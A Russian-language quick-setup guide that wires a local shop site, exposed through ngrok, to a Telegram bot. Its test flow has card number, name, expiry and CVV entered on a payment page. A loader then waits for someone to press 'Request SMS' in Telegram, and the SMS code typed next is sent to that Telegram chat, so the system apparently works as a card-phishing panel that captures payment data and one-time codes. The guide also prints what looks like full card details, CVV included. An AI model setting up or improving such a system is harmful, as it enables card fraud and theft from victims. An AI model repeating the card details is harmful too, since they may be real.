╔══════════════════════════════════════════════════════════════════╗
║      🚀 БЫСТРАЯ НАСТРОЙКА WEBHOOK - 3 ПРОСТЫХ ШАГА             ║
╚══════════════════════════════════════════════════════════════════╝

✅ ЧТО УЖЕ ЗАПУЩЕНО:
   • Backend сервер (порт 3001)
   • ngrok туннель
   • Frontend (порт 3000)
   • Веб-интерфейс ngrok открыт в браузере

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

📋 ШАГ 1: СКОПИРУЙТЕ NGROK URL

В окне ngrok найдите строку "Forwarding" и скопируйте HTTPS URL:

    Forwarding: https://abc123456.ngrok.io -> http://localhost:3001
                ^^^^^^^^^^^^^^^^^^^^^^^^^^^
                Скопируйте этот URL

ИЛИ

В браузере (http://localhost:4040) скопируйте URL из раздела "Endpoints"

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

📋 ШАГ 2: УСТАНОВИТЕ WEBHOOK

Выполните команду в PowerShell (замените URL на ваш):

    node setup-webhook.js set https://ВАШ_NGROK_URL

Пример:

    node setup-webhook.js set https://abc123456.ngrok.io

Вы увидите:

    ✅ Webhook успешно установлен!

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

📋 ШАГ 3: ПРОТЕСТИРУЙТЕ

1. Откройте: http://localhost:3000
2. Добавьте товар в корзину
3. Оформите заказ до страницы Payment
4. Введите данные карты:
   • Номер: 4633 4309 8730 5873
   • Имя: OLIVER FRABCI
   • Срок: 12/26
   • CVV: 424
5. Нажмите "Pay Now"
   ➜ Loader появится и ОСТАНЕТСЯ (не исчезнет!)
6. Откройте Telegram
7. Нажмите кнопку "📱 Запросить SMS"
8. Loader исчезнет, откроется SMS страница
9. Введите SMS код (любые 4-6 цифр)
10. Проверьте Telegram - SMS код должен прийти

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

🔍 ПРОВЕРКА WEBHOOK:

    node setup-webhook.js info

Должно показать:

    URL: https://ваш_url.ngrok.io/webhook
    Pending updates: 0
    Last error: нет ошибок

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

⚠️  ВАЖНО:

• Loader НЕ ИСЧЕЗАЕТ сам по себе - это ПРАВИЛЬНО!
• Loader исчезнет только после нажатия кнопки в Telegram
• Статус заказа НЕ МЕНЯЕТСЯ до нажатия кнопки

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

🎯 ГОТОВО! Система полностью настроена и готова к работе!

Подробная документация: WEBHOOK_SETUP_INSTRUCTIONS.md

